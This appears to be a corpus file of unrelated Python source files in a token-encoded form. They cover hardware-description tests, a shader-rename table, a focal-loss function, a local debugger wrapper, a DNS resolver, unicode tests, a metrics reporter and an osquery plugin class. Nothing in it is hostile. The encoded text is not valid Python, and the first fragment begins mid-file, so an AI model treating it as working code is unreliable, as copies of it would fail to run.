<block_start><class_stmt>_Test(m.CircuitBuilder)<block_start><def_stmt>__init__ self name<block_start>super().__init__(name)<line_sep>self._counter=0<block_end><def_stmt>fresh_name self<block_start>name=f"port{self._counter}"<line_sep>self._counter<augadd>1<line_sep><return>name<block_end><def_stmt>make_ports self *widths<block_start><assert_stmt>len(widths)<ge>2<line_sep>names=[]<for_stmt>i,width enumerate(widths)<block_start>name=self.fresh_name()<line_sep>width=widths[i]<line_sep>T=SmartBit<if>width<is><none><else>SmartBits[width]<line_sep>dir_=m.Out<if>i<eq>0<else>m.In<line_sep>self._add_port(name dir_(T))<line_sep>names.append(name)<block_end><return>[self._port(name)<for>name names]<block_end>@m.builder_method<def_stmt>_finalize self# Any Smart<x> can be wired to any Smart<y>.
<block_start>x,y=self.make_ports(10 16)<line_sep>x<augmatmul>y# truncate y
y,x=self.make_ports(16 10)<line_sep>y<augmatmul>x# extend x
x,z=self.make_ports(10 <none>)<line_sep>x<augmatmul>z# extend z
z,x=self.make_ports(<none> 10)<line_sep>z<augmatmul>x# truncate x
# Any Smart<x> (op) Smart<y> is valid; each (op) has its own width
# rules.
# Arithmetic and logic.
out,x,y=self.make_ports(12 10 16)<line_sep>out<augmatmul>x+y# width = max(12, 10, 16); op: +, -, *, /, %, &, |, ^
out,x,z=self.make_ports(<none> 10 <none>)<line_sep>out<augmatmul>x+z# width = max(1, 10, 1)
out,x=self.make_ports(16 10)<line_sep>out<augmatmul>~x# width = max(16, 10); ~
# Comparison.
out,x,y=self.make_ports(12 10 16)<line_sep>out<augmatmul>x<le>y# width = 1; op: ==, !=, <, <=, >, >=
# Reduction.
out,x=self.make_ports(4 10)<line_sep>out<augmatmul>x.reduce(operator.and_)# width = 1; op: &, |, ^
# Shifting.
out,x,y=self.make_ports(10 10 16)<line_sep>out<augmatmul>x<lshift>y# extend x, truncate output; width = 10; op: <<, >>
out,x,y=self.make_ports(16 10 16)<line_sep>out<augmatmul>y<lshift>x# extend x; width = 16
out,x,z=self.make_ports(10 10 <none>)<line_sep>out<augmatmul>x<lshift>z# extend z; width = 10
out,x,z=self.make_ports(<none> 10 <none>)<line_sep>out<augmatmul>z<lshift>x# extend z, truncate output; width = 1
# Concat.
out,x,y,z=self.make_ports(32 10 16 <none>)<line_sep>out<augmatmul>concat(x y z)<block_end><block_end># extend concat; width = 10 + 16 + 1 = 27.
<class_stmt>_TestTop(m.Circuit)<block_start>inst=_Test(name="Test")<block_end><return>type(_TestTop.instances[0])<block_end>@_run_test<def_stmt>test_complex <block_start><class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[7]) I1=m.In(SmartBits[9 <true>]) I2=m.In(SmartBits[12 <true>]) O=m.Out(SmartBits[10]) O2=m.Out(SmartBits[7]) O3=m.Out(SmartBit) )<line_sep>x=(~(io.I0+io.I1)+io.I2)<lshift>io.I0.reduce(operator.and_)<line_sep>y=signed(io.I1<le>io.I2)+signed(io.I0)<line_sep>io.O<augmatmul>x<line_sep>io.O2<augmatmul>y<line_sep>io.O3<augmatmul>io.I0<block_end>EXPECTED=("lshift(add(invert(add(Extend[width=5, "<concat>"signed=False](SmartBits[7, False](I0)), Extend[width=3, "<concat>"signed=False](SmartBits[9, True](I1)))), SmartBits[12, "<concat>"True](I2)), Extend[width=11, "<concat>"signed=False](AndReduce(SmartBits[7, False](I0))))")<assert_stmt>str(_Test.io.O._smart_expr_)<eq>EXPECTED<line_sep><return>_Test<block_end><def_stmt>test_type_constructors <block_start>T1=SmartBits[8]<assert_stmt>T1._T<is>m.Bits[8]<assert_stmt>T1._signed<eq><false><line_sep>T2=SmartBits[12 <true>]<assert_stmt>T2._T<is>m.Bits[12]<assert_stmt>T2._signed<eq><true><with_stmt>pytest.raises(TypeError)<as>pytest_e<block_start>T3=SmartBits[8][12]<assert_stmt><false><block_end>args=pytest_e.value.args<assert_stmt>args<eq>("Can not doubly qualify SmartBits, i.e. "<concat>"SmartBits[n][m] not allowed" )<block_end>@_run_test(skip_check=<true>)<def_stmt>test_unsigned_add <block_start><class_stmt>_Test(m.Circuit)<block_start>io=m.IO(x=m.In(SmartBits[8 <true>]) y=m.In(SmartBits[16 <false>]) O=m.Out(SmartBits[20 <true>]))<line_sep>io.O<augmatmul>io.x+io.y<block_end><return>_Test<block_end><def_stmt>test_make_smart <block_start><class_stmt>_T(m.Product)<block_start>x=m.Bits[8]<line_sep>y=m.Array[10 m.Bits[16]]<block_end># Value should be non-anonymous so that the value checks below work.
value=_T(name="value")<line_sep>smart=make_smart(value)<line_sep># Type checks.
<assert_stmt>isinstance(smart m.Tuple)<assert_stmt>set(type(smart).field_dict.keys())<eq>{"x" "y"}<assert_stmt>isinstance(smart.x SmartBits)<assert_stmt>len(smart.x)<eq>8<and>type(smart.x)._signed<eq><false><assert_stmt>isinstance(smart.y m.Array)<assert_stmt>isinstance(smart.y[0] SmartBits)<assert_stmt>len(smart.y[0])<eq>16<assert_stmt>type(smart.y[0])._signed<eq><false><line_sep># Value checks.
<assert_stmt>smart.x._get_magma_value_().value()<is>value.x<for_stmt>i range(10)<block_start><assert_stmt>smart.y[i]._get_magma_value_().value()<is>value.y[i]<block_end><block_end>
|
##########################################################################
#
# Copyright (c) 2018, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
<import_stmt>GafferOSL<line_sep>__nameMapping={"Utility/VectorToColor":"Conversion/VectorToColor" "Utility/BuildColor":"Conversion/FloatToColor" "Utility/SplitColor":"Conversion/ColorToFloat" "Utility/BuildPoint":"Conversion/FloatToVector" "Utility/SplitPoint":"Conversion/VectorToFloat" "Maths/FloatMix":"Maths/MixFloat" "Maths/VectorMix":"Maths/MixVector" "Maths/FloatAdd":"Maths/AddFloat" "Maths/FloatMultiply":"Maths/MultiplyFloat" "Maths/VectorAdd":"Maths/AddVector" "Maths/VectorMultiply":"Maths/ScaleVector" # A whole bunch of MaterialX shaders were renamed from `mx_<op>_<type>`
# to `mx_<op>_<type>_<type>` here:
#
# https://github.com/AcademySoftwareFoundation/OpenShadingLanguage/pull/909.
#
# It seems likely that this was a mistake, given that the equivalent
# shaders in the MaterialX repo are just `mx_<op>_<type>`. But to
# keep old scenes loading we have to do the conversion. If in future we
# switch to the MaterialX implementation, we will just have to
# reverse the renaming here.
"MaterialX/mx_add_color":"MaterialX/mx_add_color_color" "MaterialX/mx_add_color2":"MaterialX/mx_add_color2_color2" "MaterialX/mx_add_color4":"MaterialX/mx_add_color4_color4" "MaterialX/mx_add_float":"MaterialX/mx_add_float_float" "MaterialX/mx_add_surfaceshader":"MaterialX/mx_add_surfaceshader_surfaceshader" "MaterialX/mx_add_vector":"MaterialX/mx_add_vector_vector" "MaterialX/mx_add_vector2":"MaterialX/mx_add_vector2_vector2" "MaterialX/mx_add_vector4":"MaterialX/mx_add_vector4_vector4" "MaterialX/mx_clamp_color":"MaterialX/mx_clamp_color_color" "MaterialX/mx_clamp_color2":"MaterialX/mx_clamp_color2_color2" "MaterialX/mx_clamp_color4":"MaterialX/mx_clamp_color4_color4" "MaterialX/mx_clamp_float":"MaterialX/mx_clamp_float_float" "MaterialX/mx_clamp_vector":"MaterialX/mx_clamp_vector_vector" "MaterialX/mx_clamp_vector2":"MaterialX/mx_clamp_vector2_vector2" "MaterialX/mx_clamp_vector4":"MaterialX/mx_clamp_vector4_vector4" "MaterialX/mx_contrast_color":"MaterialX/mx_contrast_color_color" "MaterialX/mx_contrast_color2":"MaterialX/mx_contrast_color2_color2" "MaterialX/mx_contrast_color4":"MaterialX/mx_contrast_color4_color4" "MaterialX/mx_contrast_float":"MaterialX/mx_contrast_float_float" "MaterialX/mx_contrast_vector":"MaterialX/mx_contrast_vector_vector" "MaterialX/mx_contrast_vector2":"MaterialX/mx_contrast_vector2_vector2" "MaterialX/mx_contrast_vector4":"MaterialX/mx_contrast_vector4_vector4" "MaterialX/mx_divide_color":"MaterialX/mx_divide_color_color" "MaterialX/mx_divide_color2":"MaterialX/mx_divide_color2_color2" "MaterialX/mx_divide_color4":"MaterialX/mx_divide_color4_color4" "MaterialX/mx_divide_float":"MaterialX/mx_divide_float_float" "MaterialX/mx_divide_vector":"MaterialX/mx_divide_vector_vector" "MaterialX/mx_divide_vector2":"MaterialX/mx_divide_vector2_vector2" "MaterialX/mx_divide_vector4":"MaterialX/mx_divide_vector4_vector4" "MaterialX/mx_invert_color":"MaterialX/mx_invert_color_color" "MaterialX/mx_invert_color2":"MaterialX/mx_invert_color2_color2" "MaterialX/mx_invert_color4":"MaterialX/mx_invert_color4_color4" "MaterialX/mx_invert_float":"MaterialX/mx_invert_float_float" "MaterialX/mx_invert_vector":"MaterialX/mx_invert_vector_vector" "MaterialX/mx_invert_vector2":"MaterialX/mx_invert_vector2_vector2" "MaterialX/mx_invert_vector4":"MaterialX/mx_invert_vector4_vector4" "MaterialX/mx_max_color":"MaterialX/mx_max_color_color" "MaterialX/mx_max_color2":"MaterialX/mx_max_color2_color2" "MaterialX/mx_max_color4":"MaterialX/mx_max_color4_color4" "MaterialX/mx_max_float":"MaterialX/mx_max_float_float" "MaterialX/mx_max_vector":"MaterialX/mx_max_vector_vector" "MaterialX/mx_max_vector2":"MaterialX/mx_max_vector2_vector2" "MaterialX/mx_max_vector4":"MaterialX/mx_max_vector4_vector4" "MaterialX/mx_min_color":"MaterialX/mx_min_color_color" "MaterialX/mx_min_color2":"MaterialX/mx_min_color2_color2" "MaterialX/mx_min_color4":"MaterialX/mx_min_color4_color4" "MaterialX/mx_min_float":"MaterialX/mx_min_float_float" "MaterialX/mx_min_vector":"MaterialX/mx_min_vector_vector" "MaterialX/mx_min_vector2":"MaterialX/mx_min_vector2_vector2" "MaterialX/mx_min_vector4":"MaterialX/mx_min_vector4_vector4" "MaterialX/mx_modulo_color":"MaterialX/mx_modulo_color_color" "MaterialX/mx_modulo_color2":"MaterialX/mx_modulo_color2_color2" "MaterialX/mx_modulo_color4":"MaterialX/mx_modulo_color4_color4" "MaterialX/mx_modulo_float":"MaterialX/mx_modulo_float_float" "MaterialX/mx_modulo_vector":"MaterialX/mx_modulo_vector_vector" "MaterialX/mx_modulo_vector2":"MaterialX/mx_modulo_vector2_vector2" 
"MaterialX/mx_modulo_vector4":"MaterialX/mx_modulo_vector4_vector4" "MaterialX/mx_multiply_color":"MaterialX/mx_multiply_color_color" "MaterialX/mx_multiply_color2":"MaterialX/mx_multiply_color2_color2" "MaterialX/mx_multiply_color4":"MaterialX/mx_multiply_color4_color4" "MaterialX/mx_multiply_float":"MaterialX/mx_multiply_float_float" "MaterialX/mx_multiply_vector":"MaterialX/mx_multiply_vector_vector" "MaterialX/mx_multiply_vector2":"MaterialX/mx_multiply_vector2_vector2" "MaterialX/mx_multiply_vector4":"MaterialX/mx_multiply_vector4_vector4" "MaterialX/mx_remap_color":"MaterialX/mx_remap_color_color" "MaterialX/mx_remap_color2":"MaterialX/mx_remap_color2_color2" "MaterialX/mx_remap_color4":"MaterialX/mx_remap_color4_color4" "MaterialX/mx_remap_float":"MaterialX/mx_remap_float_float" "MaterialX/mx_remap_vector":"MaterialX/mx_remap_vector_vector" "MaterialX/mx_remap_vector2":"MaterialX/mx_remap_vector2_vector2" "MaterialX/mx_remap_vector4":"MaterialX/mx_remap_vector4_vector4" "MaterialX/mx_smoothstep_color":"MaterialX/mx_smoothstep_color_color" "MaterialX/mx_smoothstep_color2":"MaterialX/mx_smoothstep_color2_color2" "MaterialX/mx_smoothstep_color4":"MaterialX/mx_smoothstep_color4_color4" "MaterialX/mx_smoothstep_float":"MaterialX/mx_smoothstep_float_float" "MaterialX/mx_smoothstep_vector":"MaterialX/mx_smoothstep_vector_vector" "MaterialX/mx_smoothstep_vector2":"MaterialX/mx_smoothstep_vector2_vector2" "MaterialX/mx_smoothstep_vector4":"MaterialX/mx_smoothstep_vector4_vector4" "MaterialX/mx_subtract_color":"MaterialX/mx_subtract_color_color" "MaterialX/mx_subtract_color2":"MaterialX/mx_subtract_color2_color2" "MaterialX/mx_subtract_color4":"MaterialX/mx_subtract_color4_color4" "MaterialX/mx_subtract_float":"MaterialX/mx_subtract_float_float" "MaterialX/mx_subtract_vector":"MaterialX/mx_subtract_vector_vector" "MaterialX/mx_subtract_vector2":"MaterialX/mx_subtract_vector2_vector2" "MaterialX/mx_subtract_vector4":"MaterialX/mx_subtract_vector4_vector4" }<def_stmt>__loadShaderWrapper originalLoadShader<block_start><def_stmt>loadRenamedShader self shaderName **kwargs<block_start>renamed=__nameMapping.get(shaderName shaderName)<line_sep><return>originalLoadShader(self renamed **kwargs)<block_end><return>loadRenamedShader<block_end>GafferOSL.OSLShader.loadShader=__loadShaderWrapper(GafferOSL.OSLShader.loadShader)<line_sep>
|
<import_stmt>torch<import_from_stmt>torch nn<import_from_stmt>torch.nn functional<as>F<def_stmt>Focal_Loss pred gt# print('yes!!')
<block_start>ce=nn.CrossEntropyLoss()<line_sep>alpha=0.25<line_sep>gamma=2<line_sep># logp = ce(input, target)
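# element-wise binary focal loss (Lin et al., 2017): -alpha*(1-p)^gamma*log(p) for positive targets and -(1-alpha)*p^gamma*log(1-p) for negative targets, averaged below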
p=torch.sigmoid(pred)<line_sep>loss=-alpha<times>(1-p)<power>gamma<times>(gt<times>torch.log(p))-(1-alpha)<times>p<power>gamma<times>((1-gt)<times>torch.log(1-p))<line_sep><return>loss.mean()<line_sep># pred =torch.sigmoid(pred)
# pos_inds = gt.eq(1).float()
# neg_inds = gt.lt(1).float()
#
# loss = 0
#
# pos_loss = torch.log(pred + 1e-10) * torch.pow(pred, 2) * pos_inds
# # neg_loss = torch.log(1 - pred) * torch.pow(pred, 2) * neg_weights * neg_inds
# neg_loss = torch.log(1 - pred) * torch.pow(1 - pred, 2) * neg_inds
#
# num_pos = pos_inds.float().sum()
# num_neg = neg_inds.float().sum()
#
# pos_loss = pos_loss.sum()
# neg_loss = neg_loss.sum()
#
# if num_pos == 0:
# loss = loss - neg_loss
# else:
# # loss = loss - (pos_loss + neg_loss) / (num_pos)
# loss = loss - (pos_loss + neg_loss )
# return loss * 5
# if weight is not None and weight.sum() > 0:
# return (losses * weight).sum() / weight.sum()
# else:
# assert losses.numel() != 0
# return losses.mean()
<block_end>
|
<import_stmt>os<import_stmt>json<import_stmt>select<import_stmt>socket<import_stmt>subprocess<import_stmt>sys<import_stmt>tempfile<import_stmt>remotedebugger<if_stmt>sys.version_info[0]<eq>2<block_start><raise>ValueError("Wrong Python version! This script is for Python 3.")<block_end><class_stmt>DebuggerSocket()<block_start><def_stmt>__init__ self socket<block_start>self.socket=socket<line_sep>self.buffer=b''<block_end><def_stmt>fileno self<block_start><return>self.socket.fileno()<block_end><def_stmt>parse_message self<block_start><if_stmt>b'\n'<in>self.buffer<block_start>data,self.buffer=self.buffer.split(b'\n' 1)<line_sep>msg=json.loads(data.decode('utf8'))<line_sep><return>msg<block_end><block_end><def_stmt>on_read self<block_start>"""Reads bytes off the wire and returns all contained messages"""<line_sep>data=self.socket.recv(1024)<if_stmt><not>data<block_start><raise>subprocess.SubprocessError('Subprocess disconnected')<block_end>self.buffer<augadd>data<line_sep>msgs=[]<while_stmt><true><block_start>msg=self.parse_message()<if_stmt>msg<block_start>msgs.append(msg)<block_end><else_stmt><block_start><break><block_end><block_end><return>msgs<block_end><block_end><class_stmt>DebuggerProcess(object)<block_start><def_stmt>__init__ self program<block_start>self.temp_dir=tempfile.TemporaryDirectory()<line_sep>self.filename=os.path.join(self.temp_dir.name 'usermodule.py')<with_stmt>open(self.filename 'w')<as>f<block_start>f.write(program)<block_end>host,port=('127.0.0.1' 1234)<line_sep>listen_socket=socket.socket()<line_sep>listen_socket.setsockopt(socket.SOL_SOCKET socket.SO_REUSEADDR <true>)<line_sep>listen_socket.bind((host port))<line_sep>listen_socket.listen(1)<line_sep>self.p=subprocess.Popen([sys.executable os.path.abspath(remotedebugger.__file__) '--host' host '--port' str(port) '--connect' '--file' self.filename ] stdin=subprocess.PIPE # use real stdout/stderr for printing errors
)<line_sep>self.messages=[]<line_sep>self.done=<false><line_sep>self.s,_=listen_socket.accept()<line_sep>listen_socket.close()<line_sep>self.debuggerSocket=DebuggerSocket(self.s)<line_sep>self.has_already_stepped_once=<false><block_end><def_stmt>send self kind<block_start>msg=json.dumps({'kind':kind}).encode('utf8')+b'\n'<line_sep>self.s.sendall(msg)<block_end><def_stmt>step self<block_start>"""Yields messages until current stack is returned.
Yielded messages will be one of these types:
* {kind: 'stdout', data: 'data'} when the process writes to stdout
* {kind: 'stderr', data: 'data'} when the process writes to stderr
* {kind: 'error', data: 'Traceback ...'}
The first step does not step, it just returns the first stack.
"""<if_stmt>self.done<block_start><return>'done'<block_end><elif_stmt>self.has_already_stepped_once<block_start>self.send('step')<block_end><else_stmt><block_start>self.has_already_stepped_once=<true><block_end><yield><from>self.update_stack()<line_sep><return>'done'<if>self.done<else>self.stack<block_end><def_stmt>update_stack self<block_start>stack_or_done=<yield><from>self._get_stack()<if_stmt>stack_or_done<eq>'done'<block_start>self.done=<true><line_sep>self.stack=[]<block_end><else_stmt><block_start>self.stack=stack_or_done<block_end><block_end><def_stmt>_get_stack self<block_start>"""Returns a list of stack frame {lineno, functionName}, or 'done'"""<for_stmt>kind,payload self.get_subproc_msgs('stack')<block_start><if_stmt>kind<eq>'stack'<block_start>stack=payload<block_end><elif_stmt>kind<eq>'stdout'<block_start><yield>(kind payload)<block_end><elif_stmt>kind<eq>'stderr'<block_start><yield>(kind payload)<block_end><elif_stmt>kind<eq>'done'<block_start><return>'done'<block_end><elif_stmt>kind<eq>'error'<block_start><yield>('error' payload)<line_sep><return>'done'<block_end><else_stmt><block_start><raise>ValueError("Unexpected message: "+repr((kind payload)))<block_end><block_end><return>stack<block_end><def_stmt>get_subproc_msgs self kind='stack'<block_start>"""Yields subprocess messages until the requested message is received.
This method also forwards stdin bytes to the debugger subprocess,
so it's important to use it instead of a (blocking) self.s.recv()
"""<line_sep>readers=[self.debuggerSocket sys.stdin]<while_stmt><true><block_start>rs,_,_=select.select(readers [] [])<for_stmt>reader rs<block_start><if_stmt>reader<is>sys.stdin<block_start>self.p.stdin.write(bytearray(reader.readline() 'utf-8'))<block_end><elif_stmt>reader<is>self.debuggerSocket<block_start>msgs=self.debuggerSocket.on_read()<for_stmt>msg msgs<block_start><yield>(msg['kind'] msg['data'])<if_stmt>msg['kind']<eq>kind<block_start><return><block_end><block_end><block_end><block_end><block_end><block_end><def_stmt>cleanup self<block_start>self.s.close()<line_sep>self.p.stdin.close()<line_sep>self.p.kill()<line_sep>self.temp_dir.cleanup()<block_end><def_stmt>__enter__ self<block_start><return>self<block_end><def_stmt>__exit__ self *args<block_start>self.cleanup()<block_end><def_stmt>__del__ self<block_start>self.cleanup()<block_end><block_end>
|
<import_stmt>random<import_from_stmt>zope.interface implementer<import_from_stmt>twisted.internet._resolver GAIResolver<import_from_stmt>twisted.internet.defer Deferred<import_from_stmt>twisted.internet.address IPv4Address<import_from_stmt>twisted.internet.interfaces IResolverSimple IResolutionReceiver<import_from_stmt>twisted.internet.error DNSLookupError<line_sep># Inspired from /twisted/internet/_resolver.py
@implementer(IResolutionReceiver)<class_stmt>RandomWins(object)<block_start>"""
An L{IResolutionReceiver} which fires a L{Deferred} with a random result.
"""<def_stmt>__init__ self deferred<block_start>"""
@param deferred: The L{Deferred} to fire when one resolution
result arrives.
"""<line_sep>self._deferred=deferred<line_sep>self._results=[]<block_end><def_stmt>resolutionBegan self resolution<block_start>"""
See L{IResolutionReceiver.resolutionBegan}
@param resolution: See L{IResolutionReceiver.resolutionBegan}
"""<line_sep>self._resolution=resolution<block_end><def_stmt>addressResolved self address<block_start>"""
See L{IResolutionReceiver.addressResolved}
@param address: See L{IResolutionReceiver.addressResolved}
"""<line_sep>self._results.append(address.host)<block_end><def_stmt>resolutionComplete self<block_start>"""
See L{IResolutionReceiver.resolutionComplete}
"""<if_stmt>self._results<block_start>random.shuffle(self._results)<line_sep>self._deferred.callback(self._results[0])<block_end><else_stmt><block_start>self._deferred.errback(DNSLookupError(self._resolution.name))<block_end><block_end><block_end>@implementer(IResolverSimple)<class_stmt>ComplexResolverSimplifier(object)<block_start>"""
A converter from L{IHostnameResolver} to L{IResolverSimple}
"""<def_stmt>__init__ self nameResolver<block_start>"""
Create a L{ComplexResolverSimplifier} with an L{IHostnameResolver}.
@param nameResolver: The L{IHostnameResolver} to use.
"""<line_sep>self._nameResolver=nameResolver<block_end><def_stmt>getHostByName self name timeouts=()<block_start>"""
See L{IResolverSimple.getHostByName}
@param name: see L{IResolverSimple.getHostByName}
@param timeouts: see L{IResolverSimple.getHostByName}
@return: see L{IResolverSimple.getHostByName}
"""<line_sep>result=Deferred()<line_sep>self._nameResolver.resolveHostName(RandomWins(result) name 0 [IPv4Address])<line_sep><return>result<block_end><block_end><def_stmt>setUpRandomResolver reactor<block_start>resolver=GAIResolver(reactor reactor.getThreadPool)<line_sep>reactor.installResolver(ComplexResolverSimplifier(resolver))<block_end>
|
<import_stmt>sys<import_stmt>pytest<try_stmt><block_start><import_from_stmt>hypothesis given strategies<as>st example settings assume<block_end><except_stmt>ImportError<block_start>pytest.skip("hypothesis required")<block_end><import_from_stmt>pypy.module.unicodedata.interp_ucd ucd<import_from_stmt>rpython.rlib.rutf8 codepoints_in_utf8<def_stmt>make_normalization space NF_code<block_start><def_stmt>normalize s<block_start>u=s.encode('utf8')<line_sep>w_s=space.newutf8(u codepoints_in_utf8(u))<line_sep>w_res=ucd.normalize(space NF_code w_s)<line_sep><return>space.utf8_w(w_res).decode('utf8')<block_end><return>normalize<block_end>all_forms=['NFC' 'NFD' 'NFKC' 'NFKD']<line_sep># For every (n1, n2, n3) triple, applying n1 then n2 must be the same
# as applying n3.
# Reference: http://unicode.org/reports/tr15/#Design_Goals
compositions=[('NFC' 'NFC' 'NFC') ('NFC' 'NFD' 'NFD') ('NFC' 'NFKC' 'NFKC') ('NFC' 'NFKD' 'NFKD') ('NFD' 'NFC' 'NFC') ('NFD' 'NFD' 'NFD') ('NFD' 'NFKC' 'NFKC') ('NFD' 'NFKD' 'NFKD') ('NFKC' 'NFC' 'NFKC') ('NFKC' 'NFD' 'NFKD') ('NFKC' 'NFKC' 'NFKC') ('NFKC' 'NFKD' 'NFKD') ('NFKD' 'NFC' 'NFKC') ('NFKD' 'NFD' 'NFKD') ('NFKD' 'NFKC' 'NFKC') ('NFKD' 'NFKD' 'NFKD') ]<line_sep>@pytest.mark.parametrize('NF1, NF2, NF3' compositions)@example(s=u'---\uafb8\u11a7---')# issue 2289
@settings(max_examples=1000)@given(s=st.text())<def_stmt>test_composition s space NF1 NF2 NF3# chr(0xfacf) normalizes to chr(0x2284a), which is too big
<block_start>assume(<not>(s<eq>u'\ufacf'<and>sys.maxunicode<eq>65535))<line_sep>norm1,norm2,norm3=[make_normalization(space form)<for>form [NF1 NF2 NF3]]<assert_stmt>norm2(norm1(s))<eq>norm3(s)<block_end><if_stmt>sys.maxunicode<ne>65535# conditionally generate the example via an unwrapped decorator
<block_start>test_composition=example(s=u'\ufacf')(test_composition)<block_end>
|
# Expose the cell registry and load all possible cells
<import_from_stmt>.cells.basic CellBase<import_from_stmt>.cells basic<import_from_stmt>.cells hippo<import_from_stmt>.cells timestamp<import_from_stmt>. sru<line_sep>
|
# -*- coding: utf-8 -*-
<import_from_future_stmt> print_function<import_stmt>json<import_stmt>os<import_stmt>socket<import_stmt>sys<import_from_stmt>pyformance.registry set_global_registry MetricsRegistry<if_stmt>sys.version_info[0]<g>2<block_start><import_stmt>urllib.request<as>urllib<import_stmt>urllib.error<as>urlerror<block_end><else_stmt><block_start><import_stmt>urllib2<as>urllib<import_stmt>urllib2<as>urlerror<block_end><import_from_stmt>pyformance.__version__ __version__<import_from_stmt>.reporter Reporter<line_sep>DEFAULT_CARBON_SERVER="0.0.0.0"<line_sep>DEFAULT_CARBON_PORT=2003<class_stmt>NewRelicSink(object)<block_start><def_stmt>__init__ self<block_start>self.total=0<line_sep>self.count=0<line_sep>self.min=<none><line_sep>self.max=<none><line_sep>self.sum_of_squares=0<block_end><def_stmt>add self seconds<block_start>self.total<augadd>seconds<line_sep>self.count<augadd>1<line_sep>self.sum_of_squares<augadd>seconds<times>seconds<line_sep>self.min=min(self.min seconds)<if>self.min<else>seconds<line_sep>self.max=max(self.max seconds)<if>self.max<else>seconds<line_sep><pass><block_end><block_end><class_stmt>NewRelicRegistry(MetricsRegistry)<block_start><def_stmt>create_sink self<block_start><return>NewRelicSink()<block_end><block_end>set_global_registry(NewRelicRegistry())<class_stmt>NewRelicReporter(Reporter)<block_start>"""
Reporter for New Relic.
"""<line_sep>MAX_METRICS_PER_REQUEST=10000<line_sep>PLATFORM_URL="https://platform-api.newrelic.com/platform/v1/metrics"<def_stmt>__init__ self license_key registry=<none> name=socket.gethostname() reporting_interval=5 prefix="" clock=<none> <block_start>super(NewRelicReporter self).__init__(registry reporting_interval clock)<line_sep>self.name=name<line_sep>self.prefix=prefix<line_sep>self.http_headers={"Accept":"application/json" "Content-Type":"application/json" "X-License-Key":license_key }<block_end><def_stmt>report_now self registry=<none> timestamp=<none><block_start>metrics=self.collect_metrics(registry<or>self.registry)<if_stmt>metrics<block_start><try_stmt># XXX: better use http-keepalive/pipelining somehow?
<block_start>request=urllib.Request(self.PLATFORM_URL metrics.encode()<if>sys.version_info[0]<g>2<else>metrics )<for_stmt>k,v self.http_headers.items()<block_start>request.add_header(k v)<block_end>result=urllib.urlopen(request)<if_stmt>isinstance(result urlerror.HTTPError)<block_start><raise>result<block_end><block_end><except_stmt>Exception<as>e<block_start>print(e file=sys.stderr)<block_end><block_end><block_end>@property<def_stmt>agent_data self<block_start>"""Return the agent data section of the NewRelic Platform data payload
:rtype: dict
"""<line_sep><return>{"host":socket.gethostname() "pid":os.getpid() "version":__version__ }<block_end><def_stmt>create_metrics self registry<block_start>results={}<line_sep># noinspection PyProtectedMember
timers=registry._timers<for_stmt>key timers<block_start>sink=timers[key].sink<if_stmt><not>sink.count<block_start><continue><block_end>full_key="Component/%s%s"%(self.prefix key)<line_sep>results[full_key.replace("." "/")]={"total":sink.total "count":sink.count "min":sink.min "max":sink.max "sum_of_squares":sink.sum_of_squares }<line_sep>sink.__init__()<block_end><return>results<block_end><def_stmt>collect_metrics self registry<block_start>body={"agent":self.agent_data "components":[{"guid":"com.github.pyformance" "name":self.name "duration":self.reporting_interval "metrics":self.create_metrics(registry) }] }<line_sep><return>json.dumps(body ensure_ascii=<false> sort_keys=<true>)<block_end><block_end>
|
"""This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""<line_sep># pylint: disable=no-self-use
<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_future_stmt> unicode_literals<import_from_stmt>abc ABCMeta abstractmethod<import_from_stmt>future.utils with_metaclass<import_from_stmt>osquery.singleton Singleton<class_stmt>BasePlugin(with_metaclass(ABCMeta Singleton))<block_start>"""All osquery plugins should inherit from BasePlugin"""<line_sep>@abstractmethod<def_stmt>call self context<block_start>"""Call is the method that is responsible for routing a thrift request
to the appropriate class method.
This must be implemented by the plugin type (i.e. LoggerPlugin), but
explicitly not by an end-user plugin type (i.e. MyAwesomeLoggerPlugin).
call should return an ExtensionResponse, as defined in osquery.thrift.
"""<line_sep><raise>NotImplementedError<block_end>@abstractmethod<def_stmt>name self<block_start>"""The name of your plugin.
This must be implemented by your plugin.
"""<line_sep><raise>NotImplementedError<block_end><def_stmt>routes self<block_start>"""The routes that should be broadcasted by your plugin"""<line_sep><return>[]<block_end><block_end>
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
